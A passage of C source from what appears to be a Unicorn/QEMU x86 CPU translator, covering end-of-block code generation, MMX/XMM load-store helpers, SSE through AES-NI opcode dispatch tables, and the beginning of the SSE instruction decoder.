*/ if (inhibit && !(s->flags & HF_INHIBIT_IRQ_MASK)) { gen_set_hflag(s, HF_INHIBIT_IRQ_MASK); } else { gen_reset_hflag(s, HF_INHIBIT_IRQ_MASK); } if (s->base.tb->flags & HF_RF_MASK) { gen_helper_reset_rf(tcg_ctx, tcg_ctx->cpu_env); } if (s->base.singlestep_enabled) { gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); } else if (recheck_tf) { gen_helper_rechecking_single_step(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else if (s->tf) { gen_helper_single_step(tcg_ctx, tcg_ctx->cpu_env); } else if (jr) { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } s->base.is_jmp = DISAS_NORETURN; } static inline void gen_eob_worker(DisasContext *s, bool inhibit, bool recheck_tf) { do_gen_eob_worker(s, inhibit, recheck_tf, false); } /* End of block. If INHIBIT, set HF_INHIBIT_IRQ_MASK if it isn't already set. */ static void gen_eob_inhibit_irq(DisasContext *s, bool inhibit) { gen_eob_worker(s, inhibit, false); } /* End of block, resetting the inhibit irq flag. */ static void gen_eob(DisasContext *s) { gen_eob_worker(s, false, false); } /* Jump to register */ static void gen_jr(DisasContext *s, TCGv dest) { do_gen_eob_worker(s, false, false, true); } /* generate a jump to eip. No segment change must happen before as a direct call to the next block may occur */ static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num) { gen_update_cc_op(s); set_cc_op(s, CC_OP_DYNAMIC); if (s->jmp_opt) { gen_goto_tb(s, tb_num, eip); } else { gen_jmp_im(s, eip); gen_eob(s); } } static void gen_jmp(DisasContext *s, target_ulong eip) { gen_jmp_tb(s, eip, 0); } static inline void gen_ldq_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset); } static inline void gen_stq_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } static inline void gen_ldo_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_index = s->mem_index; tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_addi_tl(tcg_ctx, s->tmp0, s->A0, 8); tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->tmp0, mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(1))); } static inline void gen_sto_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_index = s->mem_index; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->tmp0, s->A0, 8); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(1))); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->tmp0, mem_index, MO_LEQ); } static inline void gen_op_movo(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset + offsetof(ZMMReg, ZMM_Q(1))); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, 
tcg_ctx->cpu_env, d_offset + offsetof(ZMMReg, ZMM_Q(1))); } static inline void gen_op_movq(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset); } static inline void gen_op_movl(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s_offset); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, d_offset); } static inline void gen_op_movq_env_0(DisasContext *s, int d_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, s->tmp1_i64, 0); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset); } typedef void (*SSEFunc_i_ep)(TCGContext *s, TCGv_i32 val, TCGv_ptr env, TCGv_ptr reg); typedef void (*SSEFunc_l_ep)(TCGContext *s, TCGv_i64 val, TCGv_ptr env, TCGv_ptr reg); typedef void (*SSEFunc_0_epi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i32 val); typedef void (*SSEFunc_0_epl)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i64 val); typedef void (*SSEFunc_0_epp)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b); typedef void (*SSEFunc_0_eppi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); typedef void (*SSEFunc_0_ppi)(TCGContext *s, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); typedef void (*SSEFunc_0_eppt)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv val); #define SSE_SPECIAL ((void *)1) #define SSE_DUMMY ((void *)2) #define MMX_OP2(x) { gen_helper_ ## x ## _mmx, gen_helper_ ## x ## _xmm } #define SSE_FOP(x) { gen_helper_ ## x ## ps, gen_helper_ ## x ## pd, \ gen_helper_ ## x ## ss, gen_helper_ ## x ## sd, } static const SSEFunc_0_epp sse_op_table1[256][4] = { /* 3DNow! extensions */ [0x0e] = { SSE_DUMMY }, /* femms */ [0x0f] = { SSE_DUMMY }, /* pf... 
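                            (3DNow! arithmetic: the actual operation is
                            selected by a trailing immediate byte and
                            dispatched through sse_op_table5)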
*/ /* pure SSE operations */ [0x10] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ [0x11] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ [0x12] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd, movsldup, movddup */ [0x13] = { SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd */ [0x14] = { gen_helper_punpckldq_xmm, gen_helper_punpcklqdq_xmm }, [0x15] = { gen_helper_punpckhdq_xmm, gen_helper_punpckhqdq_xmm }, [0x16] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd, movshdup */ [0x17] = { SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd */ [0x28] = { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ [0x29] = { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ [0x2a] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtpi2ps, cvtpi2pd, cvtsi2ss, cvtsi2sd */ [0x2b] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movntps, movntpd, movntss, movntsd */ [0x2c] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvttps2pi, cvttpd2pi, cvttsd2si, cvttss2si */ [0x2d] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtps2pi, cvtpd2pi, cvtsd2si, cvtss2si */ [0x2e] = { gen_helper_ucomiss, gen_helper_ucomisd }, [0x2f] = { gen_helper_comiss, gen_helper_comisd }, [0x50] = { SSE_SPECIAL, SSE_SPECIAL }, /* movmskps, movmskpd */ [0x51] = SSE_FOP(sqrt), [0x52] = { gen_helper_rsqrtps, NULL, gen_helper_rsqrtss, NULL }, [0x53] = { gen_helper_rcpps, NULL, gen_helper_rcpss, NULL }, [0x54] = { gen_helper_pand_xmm, gen_helper_pand_xmm }, /* andps, andpd */ [0x55] = { gen_helper_pandn_xmm, gen_helper_pandn_xmm }, /* andnps, andnpd */ [0x56] = { gen_helper_por_xmm, gen_helper_por_xmm }, /* orps, orpd */ [0x57] = { gen_helper_pxor_xmm, gen_helper_pxor_xmm }, /* xorps, xorpd */ [0x58] = SSE_FOP(add), [0x59] = SSE_FOP(mul), [0x5a] = { gen_helper_cvtps2pd, gen_helper_cvtpd2ps, gen_helper_cvtss2sd, gen_helper_cvtsd2ss }, [0x5b] = { gen_helper_cvtdq2ps, gen_helper_cvtps2dq, gen_helper_cvttps2dq }, [0x5c] = SSE_FOP(sub), [0x5d] = SSE_FOP(min), [0x5e] = SSE_FOP(div), [0x5f] = SSE_FOP(max), [0xc2] = SSE_FOP(cmpeq), [0xc6] = { (SSEFunc_0_epp)gen_helper_shufps, (SSEFunc_0_epp)gen_helper_shufpd }, /* XXX: casts */ /* SSSE3, SSE4, MOVBE, CRC32, BMI1, BMI2, ADX. 
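       These all sit behind the three-byte 0x0f 0x38 and 0x0f 0x3a escapes,
       so both rows below are SSE_SPECIAL and decoding continues in
       gen_sse().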
*/ [0x38] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, [0x3a] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* MMX ops and their SSE extensions */ [0x60] = MMX_OP2(punpcklbw), [0x61] = MMX_OP2(punpcklwd), [0x62] = MMX_OP2(punpckldq), [0x63] = MMX_OP2(packsswb), [0x64] = MMX_OP2(pcmpgtb), [0x65] = MMX_OP2(pcmpgtw), [0x66] = MMX_OP2(pcmpgtl), [0x67] = MMX_OP2(packuswb), [0x68] = MMX_OP2(punpckhbw), [0x69] = MMX_OP2(punpckhwd), [0x6a] = MMX_OP2(punpckhdq), [0x6b] = MMX_OP2(packssdw), [0x6c] = { NULL, gen_helper_punpcklqdq_xmm }, [0x6d] = { NULL, gen_helper_punpckhqdq_xmm }, [0x6e] = { SSE_SPECIAL, SSE_SPECIAL }, /* movd mm, ea */ [0x6f] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, , movdqu */ [0x70] = { (SSEFunc_0_epp)gen_helper_pshufw_mmx, (SSEFunc_0_epp)gen_helper_pshufd_xmm, (SSEFunc_0_epp)gen_helper_pshufhw_xmm, (SSEFunc_0_epp)gen_helper_pshuflw_xmm }, /* XXX: casts */ [0x71] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftw */ [0x72] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftd */ [0x73] = { SSE_SPECIAL, SSE_SPECIAL }, /* shiftq */ [0x74] = MMX_OP2(pcmpeqb), [0x75] = MMX_OP2(pcmpeqw), [0x76] = MMX_OP2(pcmpeql), [0x77] = { SSE_DUMMY }, /* emms */ [0x78] = { NULL, SSE_SPECIAL, NULL, SSE_SPECIAL }, /* extrq_i, insertq_i */ [0x79] = { NULL, gen_helper_extrq_r, NULL, gen_helper_insertq_r }, [0x7c] = { NULL, gen_helper_haddpd, NULL, gen_helper_haddps }, [0x7d] = { NULL, gen_helper_hsubpd, NULL, gen_helper_hsubps }, [0x7e] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movd, movd, , movq */ [0x7f] = { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, movdqu */ [0xc4] = { SSE_SPECIAL, SSE_SPECIAL }, /* pinsrw */ [0xc5] = { SSE_SPECIAL, SSE_SPECIAL }, /* pextrw */ [0xd0] = { NULL, gen_helper_addsubpd, NULL, gen_helper_addsubps }, [0xd1] = MMX_OP2(psrlw), [0xd2] = MMX_OP2(psrld), [0xd3] = MMX_OP2(psrlq), [0xd4] = MMX_OP2(paddq), [0xd5] = MMX_OP2(pmullw), [0xd6] = { NULL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, [0xd7] = { SSE_SPECIAL, SSE_SPECIAL }, /* pmovmskb */ [0xd8] = MMX_OP2(psubusb), [0xd9] = MMX_OP2(psubusw), [0xda] = MMX_OP2(pminub), [0xdb] = MMX_OP2(pand), [0xdc] = MMX_OP2(paddusb), [0xdd] = MMX_OP2(paddusw), [0xde] = MMX_OP2(pmaxub), [0xdf] = MMX_OP2(pandn), [0xe0] = MMX_OP2(pavgb), [0xe1] = MMX_OP2(psraw), [0xe2] = MMX_OP2(psrad), [0xe3] = MMX_OP2(pavgw), [0xe4] = MMX_OP2(pmulhuw), [0xe5] = MMX_OP2(pmulhw), [0xe6] = { NULL, gen_helper_cvttpd2dq, gen_helper_cvtdq2pd, gen_helper_cvtpd2dq }, [0xe7] = { SSE_SPECIAL, SSE_SPECIAL }, /* movntq, movntdq */ [0xe8] = MMX_OP2(psubsb), [0xe9] = MMX_OP2(psubsw), [0xea] = MMX_OP2(pminsw), [0xeb] = MMX_OP2(por), [0xec] = MMX_OP2(paddsb), [0xed] = MMX_OP2(paddsw), [0xee] = MMX_OP2(pmaxsw), [0xef] = MMX_OP2(pxor), [0xf0] = { NULL, NULL, NULL, SSE_SPECIAL }, /* lddqu */ [0xf1] = MMX_OP2(psllw), [0xf2] = MMX_OP2(pslld), [0xf3] = MMX_OP2(psllq), [0xf4] = MMX_OP2(pmuludq), [0xf5] = MMX_OP2(pmaddwd), [0xf6] = MMX_OP2(psadbw), [0xf7] = { (SSEFunc_0_epp)gen_helper_maskmov_mmx, (SSEFunc_0_epp)gen_helper_maskmov_xmm }, /* XXX: casts */ [0xf8] = MMX_OP2(psubb), [0xf9] = MMX_OP2(psubw), [0xfa] = MMX_OP2(psubl), [0xfb] = MMX_OP2(psubq), [0xfc] = MMX_OP2(paddb), [0xfd] = MMX_OP2(paddw), [0xfe] = MMX_OP2(paddl), }; static const SSEFunc_0_epp sse_op_table2[3 * 8][2] = { [0 + 2] = MMX_OP2(psrlw), [0 + 4] = MMX_OP2(psraw), [0 + 6] = MMX_OP2(psllw), [8 + 2] = MMX_OP2(psrld), [8 + 4] = MMX_OP2(psrad), [8 + 6] = MMX_OP2(pslld), [16 + 2] = MMX_OP2(psrlq), [16 + 3] = { NULL, gen_helper_psrldq_xmm }, [16 + 6] = MMX_OP2(psllq), [16 + 7]
= { NULL, gen_helper_pslldq_xmm }, }; static const SSEFunc_0_epi sse_op_table3ai[] = { gen_helper_cvtsi2ss, gen_helper_cvtsi2sd }; #ifdef TARGET_X86_64 static const SSEFunc_0_epl sse_op_table3aq[] = { gen_helper_cvtsq2ss, gen_helper_cvtsq2sd }; #endif static const SSEFunc_i_ep sse_op_table3bi[] = { gen_helper_cvttss2si, gen_helper_cvtss2si, gen_helper_cvttsd2si, gen_helper_cvtsd2si }; #ifdef TARGET_X86_64 static const SSEFunc_l_ep sse_op_table3bq[] = { gen_helper_cvttss2sq, gen_helper_cvtss2sq, gen_helper_cvttsd2sq, gen_helper_cvtsd2sq }; #endif static const SSEFunc_0_epp sse_op_table4[8][4] = { SSE_FOP(cmpeq), SSE_FOP(cmplt), SSE_FOP(cmple), SSE_FOP(cmpunord), SSE_FOP(cmpneq), SSE_FOP(cmpnlt), SSE_FOP(cmpnle), SSE_FOP(cmpord), }; static const SSEFunc_0_epp sse_op_table5[256] = { [0x0c] = gen_helper_pi2fw, [0x0d] = gen_helper_pi2fd, [0x1c] = gen_helper_pf2iw, [0x1d] = gen_helper_pf2id, [0x8a] = gen_helper_pfnacc, [0x8e] = gen_helper_pfpnacc, [0x90] = gen_helper_pfcmpge, [0x94] = gen_helper_pfmin, [0x96] = gen_helper_pfrcp, [0x97] = gen_helper_pfrsqrt, [0x9a] = gen_helper_pfsub, [0x9e] = gen_helper_pfadd, [0xa0] = gen_helper_pfcmpgt, [0xa4] = gen_helper_pfmax, [0xa6] = gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ [0xa7] = gen_helper_movq, /* pfrsqit1 */ [0xaa] = gen_helper_pfsubr, [0xae] = gen_helper_pfacc, [0xb0] = gen_helper_pfcmpeq, [0xb4] = gen_helper_pfmul, [0xb6] = gen_helper_movq, /* pfrcpit2 */ [0xb7] = gen_helper_pmulhrw_mmx, [0xbb] = gen_helper_pswapd, [0xbf] = gen_helper_pavgb_mmx /* pavgusb */ }; struct SSEOpHelper_epp { SSEFunc_0_epp op[2]; uint32_t ext_mask; }; struct SSEOpHelper_eppi { SSEFunc_0_eppi op[2]; uint32_t ext_mask; }; #define SSSE3_OP(x) { MMX_OP2(x), CPUID_EXT_SSSE3 } #define SSE41_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE41 } #define SSE42_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE42 } #define SSE41_SPECIAL { { NULL, SSE_SPECIAL }, CPUID_EXT_SSE41 } #define PCLMULQDQ_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, \ CPUID_EXT_PCLMULQDQ } #define AESNI_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_AES } static const struct SSEOpHelper_epp sse_op_table6[256] = { [0x00] = SSSE3_OP(pshufb), [0x01] = SSSE3_OP(phaddw), [0x02] = SSSE3_OP(phaddd), [0x03] = SSSE3_OP(phaddsw), [0x04] = SSSE3_OP(pmaddubsw), [0x05] = SSSE3_OP(phsubw), [0x06] = SSSE3_OP(phsubd), [0x07] = SSSE3_OP(phsubsw), [0x08] = SSSE3_OP(psignb), [0x09] = SSSE3_OP(psignw), [0x0a] = SSSE3_OP(psignd), [0x0b] = SSSE3_OP(pmulhrsw), [0x10] = SSE41_OP(pblendvb), [0x14] = SSE41_OP(blendvps), [0x15] = SSE41_OP(blendvpd), [0x17] = SSE41_OP(ptest), [0x1c] = SSSE3_OP(pabsb), [0x1d] = SSSE3_OP(pabsw), [0x1e] = SSSE3_OP(pabsd), [0x20] = SSE41_OP(pmovsxbw), [0x21] = SSE41_OP(pmovsxbd), [0x22] = SSE41_OP(pmovsxbq), [0x23] = SSE41_OP(pmovsxwd), [0x24] = SSE41_OP(pmovsxwq), [0x25] = SSE41_OP(pmovsxdq), [0x28] = SSE41_OP(pmuldq), [0x29] = SSE41_OP(pcmpeqq), [0x2a] = SSE41_SPECIAL, /* movntqda */ [0x2b] = SSE41_OP(packusdw), [0x30] = SSE41_OP(pmovzxbw), [0x31] = SSE41_OP(pmovzxbd), [0x32] = SSE41_OP(pmovzxbq), [0x33] = SSE41_OP(pmovzxwd), [0x34] = SSE41_OP(pmovzxwq), [0x35] = SSE41_OP(pmovzxdq), [0x37] = SSE42_OP(pcmpgtq), [0x38] = SSE41_OP(pminsb), [0x39] = SSE41_OP(pminsd), [0x3a] = SSE41_OP(pminuw), [0x3b] = SSE41_OP(pminud), [0x3c] = SSE41_OP(pmaxsb), [0x3d] = SSE41_OP(pmaxsd), [0x3e] = SSE41_OP(pmaxuw), [0x3f] = SSE41_OP(pmaxud), [0x40] = SSE41_OP(pmulld), [0x41] = SSE41_OP(phminposuw), [0xdb] = AESNI_OP(aesimc), [0xdc] = AESNI_OP(aesenc), [0xdd] = 
AESNI_OP(aesenclast), [0xde] = AESNI_OP(aesdec), [0xdf] = AESNI_OP(aesdeclast), }; static const struct SSEOpHelper_eppi sse_op_table7[256] = { [0x08] = SSE41_OP(roundps), [0x09] = SSE41_OP(roundpd), [0x0a] = SSE41_OP(roundss), [0x0b] = SSE41_OP(roundsd), [0x0c] = SSE41_OP(blendps), [0x0d] = SSE41_OP(blendpd), [0x0e] = SSE41_OP(pblendw), [0x0f] = SSSE3_OP(palignr), [0x14] = SSE41_SPECIAL, /* pextrb */ [0x15] = SSE41_SPECIAL, /* pextrw */ [0x16] = SSE41_SPECIAL, /* pextrd/pextrq */ [0x17] = SSE41_SPECIAL, /* extractps */ [0x20] = SSE41_SPECIAL, /* pinsrb */ [0x21] = SSE41_SPECIAL, /* insertps */ [0x22] = SSE41_SPECIAL, /* pinsrd/pinsrq */ [0x40] = SSE41_OP(dpps), [0x41] = SSE41_OP(dppd), [0x42] = SSE41_OP(mpsadbw), [0x44] = PCLMULQDQ_OP(pclmulqdq), [0x60] = SSE42_OP(pcmpestrm), [0x61] = SSE42_OP(pcmpestri), [0x62] = SSE42_OP(pcmpistrm), [0x63] = SSE42_OP(pcmpistri), [0xdf] = AESNI_OP(aeskeygenassist), }; static void gen_sse(CPUX86State *env, DisasContext *s, int b, target_ulong pc_start, int rex_r) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b1, op1_offset, op2_offset, is_xmm, val; int modrm, mod, rm, reg; SSEFunc_0_epp sse_fn_epp; SSEFunc_0_eppi sse_fn_eppi; SSEFunc_0_ppi sse_fn_ppi; SSEFunc_0_eppt sse_fn_eppt; MemOp ot; b &= 0xff; if (s->prefix & PREFIX_DATA) b1 = 1; else if (s->prefix & PREFIX_REPZ) b1 = 2; else if (s->prefix & PREFIX_REPNZ) b1 = 3; else b1 = 0; sse_fn_epp = sse_op_table1[b][b1]; if (!sse_fn_epp) { goto unknown_op; } if ((b <= 0x5f && b >= 0x10) || b == 0xc6 || b == 0xc2) { is_xmm = 1; } else { if (b1 == 0) { /* MMX case */ is_xmm = 0; } else { is_xmm = 1; } } /* simple MMX/SSE operation */ if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); return; } if (s->flags & HF_EM_MASK) { illegal_op: gen_illegal_opcode(s); return; } if (is_xmm && !(s->flags & HF_OSFXSR_MASK) && ((b != 0x38 && b != 0x3a) || (s->prefix & PREFIX_DATA))) { goto unknown_op; } if (b == 0x0e) { if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) { /* If we were fully decoding this we might use illegal_op. */ goto unknown_op; } /* femms */ gen_helper_emms(tcg_ctx, tcg_ctx->cpu_env); return; } if (b == 0x77) { /* emms */ gen_helper_emms(tcg_ctx, tcg_ctx->cpu_env); return; } /* prepare MMX state (XXX: optimize by storing fptt and fptags in the static cpu state) */ if (!is_xmm) { gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); } modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7); if (is_xmm) reg |= rex_r; mod = (modrm >> 6) & 3; /* VEX.L (256 bit) encodings are not supported */ if (s->vex_l != 0) { goto illegal_op; // perhaps it should be unknown_op? 
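        // This translator has no AVX/YMM state, so every VEX.L=1 (256-bit)
        // encoding is rejected up front.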
} if (sse_fn_epp == SSE_SPECIAL) { b |= (b1 << 8); switch(b) { case 0x0e7: /* movntq */ if (mod == 3) { goto illegal_op; } gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); break; case 0x1e7: /* movntdq */ case 0x02b: /* movntps */ case 0x12b: /* movntps */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); break; case 0x3f0: /* lddqu */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); break; case 0x22b: /* movntss */ case 0x32b: /* movntsd */ if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); if (b1 & 1) { gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); gen_op_st_v(s, MO_32, s->T0, s->A0); } break; case 0x6e: /* movd mm, ea */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, fpregs[reg].mmx)); } else #endif { gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_movl_mm_T0_mmx(tcg_ctx, s->ptr0, s->tmp2_i32); } break; case 0x16e: /* movd xmm, ea */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); gen_helper_movq_mm_T0_xmm(tcg_ctx, s->ptr0, s->T0); } else #endif { gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_movl_mm_T0_xmm(tcg_ctx, s->ptr0, s->tmp2_i32); } break; case 0x6f: /* movq mm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); } else { rm = (modrm & 7); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[rm].mmx)); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); } break; case 0x010: /* movups */ case 0x110: /* movupd */ case 0x028: /* movaps */ case 0x128: /* movapd */ case 0x16f: /* movdqa xmm, ea */ case 0x26f: /* movdqu xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movo(s, offsetof(CPUX86State, xmm_regs[reg]), offsetof(CPUX86State,xmm_regs[rm])); } break; case 0x210: /* movss xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(0))); } break; case 0x310: /* movsd xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, 
xmm_regs[reg].ZMM_Q(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } break; case 0x012: /* movlps */ case 0x112: /* movlpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { /* movhlps */ rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(1))); } break; case 0x212: /* movsldup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(0))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(2))); } 